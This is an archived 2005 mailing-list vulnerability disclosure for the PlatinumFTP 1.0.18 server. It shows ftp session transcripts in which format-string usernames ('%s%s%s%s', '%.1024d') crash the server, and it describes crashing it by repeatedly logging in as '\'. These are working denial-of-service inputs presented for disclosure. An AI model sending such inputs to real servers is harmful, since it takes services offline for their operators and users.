lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: ml at portsonline.net (ports)
Subject: PlatinumFTP 1.0.18 remote DoS

Application: PlantinumFTP
Site:        http://www.roboshareware.com/indexplatinumftp.php
Version:     1.0.18 and maybe lower
OS:          Windows
Bug:         Remote Denial of Service


=====
Product:
PlatinumFTPserver simplifies management of all your Ftp clients with
regards to sending and receiving program and data files over an IP
connection.


=====
About:
I didn't found any informations about the Bugs I've found and the
vendor doesn't seem to be interested in fixing problems (see History).
Since PlatinumFTP isn't a mainstream server I decided to make this
Disclosure.

Well, I found 3 different ways do shut down (denial of service) a
PlatinumFTP 1.0.18 server. At least you doesn't need a valid user.


=====
First Bug:
You can stop the server using %s%s%s%s as username.

-------------------- schnipp --------------------
ports@...m:~$ ftp 192.168.10.101
Connected to 192.168.10.101.
220-PlatinumFTPserver V1.0.18
220 Enter login details
Name (192.168.10.101:ports): %s%s%s%s
421 Service not available, remote server has closed connection
Login failed.
No control connection for command: Transport endpoint is not connected
ftp>
-------------------- schnapp --------------------


=====
Second Bug:
You can stop the server using %.1024d as username.

-------------------- schnipp --------------------
ports@...m:~$ ftp 192.168.10.101
Connected to 192.168.10.101.
220-PlatinumFTPserver V1.0.18
220 Enter login details
Name (192.168.10.101:ports): %.1024d
331 Password required for 000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000421 Service not available, remote server
has closed connection
Login failed.
No control connection for command: Transport endpoint is not connected
ftp>
-------------------- schnapp --------------------


=====
Third Bug:
Well, shuting down a server using the third bug is, compared to the
first Bugs, really tricky *cough*. If you put in a \ as username the
Server will show a requester on his console saying 'Incorrect Format:
HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'.
The ftp login process for the current session will stop until someone
affirmed this message.

I wrote a little perl script to see if it's possible to shut the server
down and it's working. You just have to connect a couple of times using
the username \ and after a few connections (>50) the server will crash.

Since most of you guys know how to write a script like that I doens't
attach it :) Of course you can find them later on my homepage.


=====
History:
2005-03-05: Found the Bugs and mailed the vendor
2005-03-07: Mailed the vendor again using all mailaddresse I found
2005-03-10: Created a yahoo-account *sigh* to make a forum post
2005-03-12: Still no response...



Well, now let's count the hours/days until someone is telling me I'm a
fool because I didn't made a working exploit out of it.


ports

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ